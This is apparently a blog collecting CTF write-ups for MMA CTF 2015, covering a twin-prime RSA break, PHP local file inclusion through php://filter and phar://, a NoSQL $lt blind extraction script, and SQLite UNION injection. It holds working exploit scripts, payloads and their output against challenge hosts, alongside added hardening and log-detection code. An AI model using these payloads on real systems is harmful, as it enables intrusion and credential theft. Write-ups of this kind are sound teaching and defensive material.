shpik's world!

5 posts in '0x400 CTF/0x401 MMA 1st 2015'

  1. [Crypto] Twin Prime - 50pts
  2. [Web] Global Page - 50pts
  3. [Web] Get the admin password! - 100pts
  4. [Web] Mortal Magi Agents - 300pts
  5. [Web] Login as admin! - 30pts

[Crypto] Twin Prime - 50pts

0x400 CTF/0x401 MMA 1st 2015


Problem

Decrypt it.
twin-primes.7z

Flag

#: 1, Your Score: 50, Score: 50, Teams: 183



# encrypt.py
from Crypto.Util.number import *
import Crypto.PublicKey.RSA as RSA
import os

N = 1024

def getTwinPrime(N):
    while True:
        p = getPrime(N)
        if isPrime(p+2):
            return p

def genkey(N = 1024):
    p = getTwinPrime(N)
    q = getTwinPrime(N)
    n1 = p*q
    n2 = (p+2)*(q+2)
    e = long(65537)
    d1 = inverse(e, (p-1)*(q-1))
    d2 = inverse(e, (p+1)*(q+1))
    key1 = RSA.construct((n1, e, d1))
    key2 = RSA.construct((n2, e, d2))
    if n1 < n2:
        return (key1, key2)
    else:
        return (key2, key1)

rsa1, rsa2 = genkey(N)

with open("flag", "r") as f:
    flag = f.read()
padded_flag = flag + "\0" + os.urandom(N/8 - 1 - len(flag))

c = bytes_to_long(padded_flag)
c = rsa1.encrypt(c, 0)[0]
c = rsa2.encrypt(c, 0)[0]

with open("key1", "w") as f:
    f.write("%d\n" % rsa1.n)
    f.write("%d\n" % rsa1.e)
with open("key2", "w") as f:
    f.write("%d\n" % rsa2.n)
    f.write("%d\n" % rsa2.e)

with open("encrypted", "w") as f:
    f.write("%d\n" % c)


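Both moduli are public, so p+q can be computed without factoring:

n1 = p*q

n2 = (p+2)*(q+2) = p*q + 2( p+q ) + 4

2( p+q ) = n2 - p*q - 4

p+q = ( n2 - n1 - 4 )/2


d1 is the inverse of e modulo (p-1)*(q-1):

(p-1)*(q-1) = p*q - ( p+q ) + 1


d2 is the inverse of e modulo (p+1)*(q+1):

(p+1)*(q+1) = p*q + ( p+q ) + 1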

# twin_prime.py
from Crypto.Util.number import *
import Crypto.PublicKey.RSA as RSA
import os

n1 = 19402643768027967294480695361037227649637514561280461352708420192197328993512710852087871986349184383442031544945263966477446685587168025154775060178782897097993949800845903218890975275725416699258462920097986424936088541112790958875211336188249107280753661467619511079649070248659536282267267928669265252935184448638997877593781930103866416949585686541509642494048554242004100863315220430074997145531929128200885758274037875349539018669336263469803277281048657198114844413236754680549874472753528866434686048799833381542018876362229842605213500869709361657000044182573308825550237999139442040422107931857506897810951
n2 = 19402643768027967294480695361037227649637514561280461352708420192197328993512710852087871986349184383442031544945263966477446685587168025154775060178782897097993949800845903218890975275725416699258462920097986424936088541112790958875211336188249107280753661467619511079649070248659536282267267928669265252935757418867172314593546678104100129027339256068940987412816779744339994971665109555680401467324487397541852486805770300895063315083965445098467966738905392320963293379345531703349669197397492241574949069875012089172754014231783160960425531160246267389657034543342990940680603153790486530477470655757947009682859
e = long(65537)

p_q = (n2-n1-4)/2
phi_n1 = n1-p_q+1
phi_n2 = n1+p_q+1

d1 = inverse(e, phi_n1)
d2 = inverse(e, phi_n2)

key1 = RSA.construct((n1,e,d1))
key2 = RSA.construct((n2,e,d2))

c = 7991219189591014572196623817385737879027208108469800802629706564258508626010674513875496029177290575819650366802730803283761137036255380767766538866086463895539973594615882321974738140931689333873106124459849322556754579010062541988138211176574621668101228531769828358289973150393343109948611583609219420213530834364837438730411379305046156670015024547263019932288989808228091601206948741304222197779808592738075111024678982273856922586615415238555211148847427589678238745186253649783665607928382002868111278077054871294837923189536714235044041993541158402943372188779797996711792610439969105993917373651847337638929


c = key2.decrypt(c)
c = key1.decrypt(c)
c = long_to_bytes(c)
print c
'''
shpik@shpik:/ctf/MMA/crypt$ python twin_primes.py 
TWCTF{3102628d7059fa267365f8c37a0e56cf7e0797ef}
 ࠝ髀	0ݔм5듲E$K
麗hj@殁¾؈'(喠ﻫ¬a걅Ƅm¶ZLʔa

'''
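
The same recovery in Python 3 with only the standard library, as an added example that is not part of the original post. It goes one step further than the solver above and also recovers p and q from p+q and p*q; the toy twin primes and the message are constructed for the demo.

```python
from math import isqrt

E = 65537

def recover_private(n1, n2, e=E):
    """Derive (d1, d2, p, q) from the two public moduli of encrypt.py."""
    s = (n2 - n1 - 4) // 2            # p + q, from n2 - n1 = 2(p + q) + 4
    phi1 = n1 - s + 1                 # (p - 1)(q - 1) = phi(n1)
    phi2 = n1 + s + 1                 # (p + 1)(q + 1) = phi(n2)
    r = isqrt(s * s - 4 * n1)         # |p - q|, since (p - q)^2 = s^2 - 4*n1
    p, q = (s - r) // 2, (s + r) // 2
    if p * q != n1 or (p + 2) * (q + 2) != n2:
        raise ValueError("moduli are not of the form p*q and (p+2)*(q+2)")
    return pow(e, -1, phi1), pow(e, -1, phi2), p, q

def decrypt(c, n1, n2, e=E):
    d1, d2, _, _ = recover_private(n1, n2, e)
    return pow(pow(c, d2, n2), d1, n1)   # undo rsa2 first, then rsa1

def demo():
    # Constructed toy values: 10007/10009 and 1000000007/1000000009 are twin primes.
    p, q = 10007, 1000000007
    n1, n2 = p * q, (p + 2) * (q + 2)
    m = int.from_bytes(b"flag!", "big")
    c = pow(pow(m, E, n1), E, n2)        # same order as encrypt.py: rsa1, then rsa2
    recovered = decrypt(c, n1, n2)
    return recovered.to_bytes(5, "big"), recover_private(n1, n2)[2:]

if __name__ == "__main__":
    print(demo())
```

The takeaway for key generation is that any public algebraic relation between the primes of two moduli removes the need to factor either one.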


Other posts in the '0x400 CTF > 0x401 MMA 1st 2015' category

[Crypto] Twin Prime - 50pts  (0) 2016.09.05
[Web] Global Page - 50pts  (0) 2016.09.05
[Web] Get the admin password! - 100pts  (0) 2016.09.05
[Web] Mortal Magi Agents - 300pts  (0) 2015.09.09
[Web] Login as admin! - 30pts  (0) 2015.09.08

[Web] Global Page - 50pts

0x400 CTF/0x401 MMA 1st 2015

Problem

This problem is not available now.
[09/03 01:14 +00:00] fixed.

Welcome to TokyoWesterns' CTF!

Flag

#: 1, Your Score: 50, Score: 50, Teams: 195




shpik@shpik:/ctf/MMA/web/gap$ curl http://globalpage.chal.ctf.westerns.tokyo/?page=tokyo
<!doctype html>
<html>
<head>
<meta charset=utf-8>
<title>Global Page</title>
<style>
.rtl {
  direction: rtl;
}
</style>
</head>

<body>
<br />
<b>Notice</b>:  Undefined index: HTTP_ACCEPT_LANGUAGE in <b>/var/www/globalpage/index.php</b> on line <b>36</b><br />
<p>
<br />
<b>Warning</b>:  include(tokyo/.php): failed to open stream: No such file or directory in <b>/var/www/globalpage/index.php</b> on line <b>41</b><br />
<br />
<b>Warning</b>:  include(): Failed opening 'tokyo/.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in <b>/var/www/globalpage/index.php</b> on line <b>41</b><br />
</p>
</body>
</html>


The Accept-Language header (HTTP_ACCEPT_LANGUAGE) is the file name,

and page is the directory.



So I expect: include $page . '/' . (value of the Accept-Language header) . '.php'




shpik@shpik:/ctf/MMA/web/gap$ curl 'http://globalpage.chal.ctf.westerns.tokyo/?page=php:' -H "Accept-Language:/filter/convert.base64-encode/resource=index"
<!doctype html>
<html>
<head>
<meta charset=utf-8>
<title>Global Page</title>
<style>
.rtl {
  direction: rtl;
}
</style>
</head>

<body>
<p>
[base64-encoded source of index.php]</p>
</body>
</html>



OK, I got index.php with php://filter!


<!-- index.php -->
<?php
if (!defined('INCLUDED_INDEX')) {
define('INCLUDED_INDEX', true);
ini_set('display_errors', 1);
include "flag.php";
?>
<!doctype html>
<html>
<head>
<meta charset=utf-8>
<title>Global Page</title>
<style>
.rtl {
  direction: rtl;
}
</style>
</head>
<body>
<?php
$dir = "";
if(isset($_GET['page'])) {
	$dir = str_replace(['.', '/'], '', $_GET['page']);
}

if(empty($dir)) {
?>
<ul>
	<li><a href="/?page=tokyo">Tokyo</a></li>
	<li><del>Westerns</del></li>
	<li><a href="/?page=ctf">CTF</a></li>
</ul>
<?php
}
else {
	foreach(explode(",", $_SERVER['HTTP_ACCEPT_LANGUAGE']) as $lang) {
		$l = trim(explode(";", $lang)[0]);
?>
<p<?=($l==='he')?" class=rtl":""?>>
<?php
		include "$dir/$l.php";
?>
</p>
<?php
	}
}
?>
</body>
</html>
<?php
}
?>

Maybe I can get flag.php's source the same way to get the flag.


shpik@shpik:/ctf/MMA/web/gap$ curl 'http://globalpage.chal.ctf.westerns.tokyo/?page=php:' -H "Accept-Language:/filter/convert.base64-encode/resource=flag"
<!doctype html>
<html>
<head>
<meta charset=utf-8>
<title>Global Page</title>
<style>
.rtl {
  direction: rtl;
}
</style>
</head>

<body>
<p>
PD9waHAKJGZsYWcgPSAiVFdDVEZ7SV9mb3VuZF9zaW1wbGVfTEZJfSI7Cg==</p>
</body>
</html>



Flag is

[ TWCTF{I_found_simple_LFI} ]
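
Why the filter in index.php fails and what a stricter check looks like, as an added Python model that is not code from the challenge or the original post. The path building mirrors index.php; the language-tag pattern and the function names are assumptions made for this example.

```python
import re

PAGES = {"tokyo", "ctf"}          # the two directories index.php links to
LANG_TAG = re.compile(r"[A-Za-z]{1,8}(-[A-Za-z0-9]{1,8})*")   # assumed tag shape

def first_langs(accept_language):
    """Mirror index.php: split on ',', drop the ';q=' part, trim."""
    return [part.split(";")[0].strip() for part in accept_language.split(",")]

def include_targets_original(page, accept_language):
    """The strings index.php hands to include(), built the way it builds them."""
    d = page.replace(".", "").replace("/", "")   # only 'page' is filtered
    if not d:
        return []
    return ["%s/%s.php" % (d, lang) for lang in first_langs(accept_language)]

def include_targets_hardened(page, accept_language):
    """Allowlist the directory and accept only well-formed language tags."""
    if page not in PAGES:
        return []
    return ["%s/%s.php" % (page, lang)
            for lang in first_langs(accept_language) if LANG_TAG.fullmatch(lang)]

if __name__ == "__main__":
    header = "/filter/convert.base64-encode/resource=index"   # value from the post
    print(include_targets_original("php:", header))
    print(include_targets_hardened("php:", header))
    print(include_targets_hardened("tokyo", "en-US,en;q=0.8,ja;q=0.6"))
```

Stripping '.' and '/' from one input does nothing when the slashes arrive through the second, unfiltered input, so both halves of the path need validation.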




[Web] Get the admin password! - 100pts

0x400 CTF/0x401 MMA 1st 2015



This problem is a very simple NoSQL injection.



# exploit.py
import urllib2
import urllib
URL = "http://gap.chal.ctf.westerns.tokyo/login.php"

result = ""
for i in range(100):
	for j in range(0x20,0x90):
		data = {'user' : 'admin', 'password[$lt]' : result+chr(j)}
		data = urllib.urlencode(data)
		req = urllib2.Request(URL,data)
		res = urllib2.urlopen(req)
		if res.read().find("Wrong user name or password")>10:
			continue
		else:
			result += chr(j-1)
			print result
			break
'''
shpik@shpik:/ctf/MMA/web/gap$ python exploit.py 
T
TW
TWC
TWCT
TWCTF
TWCTF{
TWCTF{w
TWCTF{wa
TWCTF{was
TWCTF{wass
TWCTF{wassh
TWCTF{wassho
TWCTF{wasshoi
TWCTF{wasshoi!
TWCTF{wasshoi!s
TWCTF{wasshoi!su
TWCTF{wasshoi!sum
TWCTF{wasshoi!summ
TWCTF{wasshoi!summe
TWCTF{wasshoi!summer
TWCTF{wasshoi!summer_
TWCTF{wasshoi!summer_f
TWCTF{wasshoi!summer_fe
TWCTF{wasshoi!summer_fes
TWCTF{wasshoi!summer_fest
TWCTF{wasshoi!summer_festi
TWCTF{wasshoi!summer_festiv
TWCTF{wasshoi!summer_festiva
TWCTF{wasshoi!summer_festival
TWCTF{wasshoi!summer_festival!
TWCTF{wasshoi!summer_festival!}
'''
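
Why 'password[$lt]' works as a comparison oracle and how a type check closes it, as an added Python model that is not the challenge's code. It assumes login.php passes PHP-parsed form values straight into a document-store query; the matcher, the stored password and all names are constructed stand-ins.

```python
import re

USERS = [{"user": "admin", "password": "CONSTRUCTED-SECRET"}]   # constructed data

def php_form(pairs):
    """Mimic PHP turning 'name[key]=value' into a nested array."""
    out = {}
    for name, value in pairs:
        m = re.fullmatch(r"([^\[\]]+)\[([^\[\]]*)\]", name)
        if m:
            out.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            out[name] = value
    return out

def matches(doc, query):
    """Tiny stand-in for a document-store matcher: equality plus $lt."""
    for field, cond in query.items():
        if isinstance(cond, dict):
            if not all(op == "$lt" and doc[field] < arg for op, arg in cond.items()):
                return False
        elif doc.get(field) != cond:
            return False
    return True

def login_vulnerable(form):
    # The parsed array becomes a query operator instead of a value to compare.
    query = {"user": form["user"], "password": form["password"]}
    return any(matches(u, query) for u in USERS)

def login_hardened(form):
    user, password = form.get("user"), form.get("password")
    if not (isinstance(user, str) and isinstance(password, str)):
        return False              # arrays are never valid credentials
    return any(matches(u, {"user": user, "password": password}) for u in USERS)

if __name__ == "__main__":
    probe = php_form([("user", "admin"), ("password[$lt]", "D")])
    print(probe, login_vulnerable(probe), login_hardened(probe))
```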



[Web] Mortal Magi Agents - 300pts

0x400 CTF/0x401 MMA 1st 2015


Problem

http://magiagents.chal.mmactf.link/

Flag

#: 1, Your Score: 300, Score: 300, Teams: 77


This problem is vulnerable to LFI.


Problem Page [ http://magiagents.chal.mmactf.link/ ]



'index.php?page=settings' is the vulnerable point.

The settings page has a file upload.


First, I got the PHP source.


http://magiagents.chal.mmactf.link/index.php?page=php://filter/convert.base64-encode/resource=home

// home.php


// index.php
<?php
session_start();

if (!isset($_GET["page"]) || isset($page))
    $page = "home";
else
    $page = $_GET["page"];
?>
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="favicon.ico">

    <title>Mortal Magi Agents</title>

    <!-- Bootstrap core CSS -->
    <link href="css/bootstrap.min.css" rel="stylesheet">

    <!-- Custom styles for this template -->
    <link href="css/jumbotron.css" rel="stylesheet">

    <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
  </head>

  <body>

    <nav class="navbar navbar-inverse navbar-fixed-top">
      <div class="container">
        <div class="navbar-header">
          <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
            <span class="sr-only">Toggle navigation</span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
          </button>
          <a class="navbar-brand" href="index.php">Mortal Magi Agents</a>
        </div>
        <div id="navbar" class="collapse navbar-collapse">
          <ul class="nav navbar-nav">
            <li class="active"><a href="?page=home">Home</a></li>
            <li><a href="?page=news">News</a></li>
            <li><a href="#contact">Contact</a></li>
          </ul>
<?php if (isset($_SESSION["user"])) { ?>
          <ul class="nav navbar-nav navbar-right">
            <li class='dropdown'>
              <a href="#" aria-expanded="false" class="dropdown-toggle" data-toggle="dropdown" role="button">
              <?php
              if (isset($_SESSION["avator"])) {
                  echo '<img src="'.$_SESSION['avator'].'" width="32" height="32">';
              }
              echo $_SESSION["user"];
              ?><span class='caret'></span></a>
              <ul class='dropdown-menu' role='menu'>
              <li><a href="?page=settings">Settings</a></li>
              <li><a href="logout.php">Sign out</a></li>
              </ul>
            </li>
          </ul>
<?php } else { ?>
          <form class="navbar-form navbar-right" action="login.php" method="post">
            <div class="form-group">
              <input type="text" placeholder="User" class="form-control" name="user">
            </div>
            <div class="form-group">
              <input type="password" placeholder="Password" class="form-control" name="password">
            </div>
            <button type="submit" class="btn btn-success" name="signin">Sign in</button>
            <button type="submit" class="btn btn-danger" name="signup">Sign up</button>
          </form>
<?php } ?>
        </div><!--/.nav-collapse -->
      </div>
    </nav>

    <!-- Main jumbotron for a primary marketing message or call to action -->
    <!--
    <div class="jumbotron">
    </div>
    -->
    <div class="container">
<?php
include("$page.php");
?>
      </div>


      <hr>

      <footer>
        <p>Mortal Magi Agents 2015</p>
      </footer>
    </div> <!-- /container -->


    <!-- Bootstrap core JavaScript
    ================================================== -->
    <!-- Placed at the end of the document so the pages load faster -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
  </body>
</html>


// settings.php
<?php
require "./db.php";
if (isset($_FILES["file"])) {
    if ($_FILES['file']['type'] == "image/jpeg") {
        $ext = ".jpg";
    }
    else if ($_FILES['file']['type'] == "image/gif") {
        $ext = ".gif";
    }
    else if ($_FILES['file']['type'] == "image/png") {
        $ext = ".png";
    }
    $filename = "avators/" . $_SESSION["user"] . sha1_file($_FILES['file']['tmp_name']) . $ext;
    move_uploaded_file($_FILES['file']['tmp_name'], $filename);
    
    $_SESSION["avator"] = $filename;
    $db = connect_db();
    $db->query("UPDATE users SET avator = '$filename' WHERE name = '".$_SESSION['user']."'");
}
?>
<div class="page-header"><h1>Settings</h1></div>
<h2>Avator</h2>
<?php
if (isset($_SESSION["avator"])) {
?>
<img src="<?php echo $_SESSION['avator']; ?>" width="64" height="64">
<?php
}
?>
<h3>New avator</h3>
<form method="POST" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit">
</form>



The uploaded file is saved as 'avators/' + user + sha1 of the uploaded file + extension.

But this name is not a problem.


I used the phar:// wrapper.


getflag.php

<?php echo file_get_contents('../flag');?>


http://magiagents.chal.mmactf.link/?page=phar:///var/www/html/avators/afafafb347d0cf8bd02e7ddd7c018e74fa336beff2b0b5.jpg/getflag


MMA{5ded4df85bb8785f9cff08268703278c4e18e3fd}


Good

Flag is MMA{5ded4df85bb8785f9cff08268703278c4e18e3fd}
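
A detection sketch for the requests used in this post and in Global Page, as an added example that is not part of the original writeups. It flags access-log lines whose page parameter starts with a URL scheme after percent-decoding; the log lines, IP addresses and the EXAMPLE.jpg name are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

SCHEME = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*:")      # 'php:', 'phar:', ...
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def wrapper_hits(log_lines, param="page"):
    """Return (scheme, decoded value) for each request whose param names a scheme."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        # parse_qs percent-decodes, so encoded ':' and '/' are caught as well
        for value in parse_qs(query, keep_blank_values=True).get(param, []):
            if SCHEME.match(value):
                hits.append((value.split(":", 1)[0].lower(), value))
    return hits

SAMPLE_LOG = [   # constructed lines in common log format
    '198.51.100.7 - - [09/Sep/2015:10:00:01 +0000] "GET /index.php?page=news HTTP/1.1" 200 2310',
    '198.51.100.7 - - [09/Sep/2015:10:00:09 +0000] "GET /index.php?page=php://filter/convert.base64-encode/resource=home HTTP/1.1" 200 5120',
    '198.51.100.7 - - [09/Sep/2015:10:02:41 +0000] "GET /?page=phar%3A%2F%2F%2Fvar%2Fwww%2Fhtml%2Favators%2FEXAMPLE.jpg%2Fgetflag HTTP/1.1" 200 812',
    # Global Page style: only the scheme half is visible in the URL
    '198.51.100.9 - - [03/Sep/2016:01:20:00 +0000] "GET /?page=php: HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for scheme, value in wrapper_hits(SAMPLE_LOG):
        print(scheme, value)
```

A legitimate page name never contains a scheme, so any hit is worth a look even when the response code is 200.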



[Web] Login as admin! - 30pts

0x400 CTF/0x401 MMA 1st 2015


Problem

Login as admin. And get the flag! The flag is the password of admin.

http://arrive.chal.mmactf.link/login.cgi

You can use test:test.

Flag

#: 1, Your Score: 30, Score: 30, Teams: 318


Problem Page [ http://arrive.chal.mmactf.link/login.cgi ]

 
 



This problem is SQL injection, and the database is SQLite.


Let's exploit!


First, I send a simple query.


POST DATA : username=admin' --&password=1

Congratulations!!
You are admin user.
The flag is your password!

logout


Oh... the flag is admin's password.


So I look for the table name.


POST DATA : username=admin' union select name, NULL from sqlite_master--&password=1

You are user user.

logout

The table name is 'user'.


So I inject a UNION query into username.


POST DATA : username=admin' union select password,NULL from user limit 0,1--&password=1


You are MMA{cats_alice_band} user.

logout


Good!

Flag is MMA{cats_alice_band}


Actually, this problem has no filtering,

so you can use blind SQL injection.




Author : shpik (http://shpik.tistory.com)
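
The three username values from this post run against a string-built query and a parameterized one, as an added example that is not the challenge's code. It uses an in-memory SQLite database; the column names, the test user and the stored password are assumptions constructed for the demo (the post only shows a table 'user' with a 'password' column).

```python
import sqlite3

SECRET = "CONSTRUCTED{not_the_real_flag}"    # constructed sample password

def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE user (username TEXT, password TEXT)")
    db.executemany("INSERT INTO user VALUES (?, ?)",
                   [("admin", SECRET), ("test", "test")])
    return db

def names_concat(db, username, password):
    """Vulnerable form: user input is pasted into the SQL text."""
    sql = ("SELECT username, password FROM user "
           "WHERE username = '%s' AND password = '%s'" % (username, password))
    return [row[0] for row in db.execute(sql)]

def names_bound(db, username, password):
    """Hardened form: values travel as bound parameters, never as SQL."""
    sql = "SELECT username, password FROM user WHERE username = ? AND password = ?"
    return [row[0] for row in db.execute(sql, (username, password))]

PAGE_INPUTS = [      # the username values shown in the post
    "admin' --",
    "admin' union select name, NULL from sqlite_master--",
    "admin' union select password,NULL from user limit 0,1--",
]

if __name__ == "__main__":
    db = make_db()
    for value in PAGE_INPUTS:
        print(repr(value), names_concat(db, value, "1"), names_bound(db, value, "1"))
```

With bound parameters each input is compared as a literal user name, so all three return no rows while test:test still logs in.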
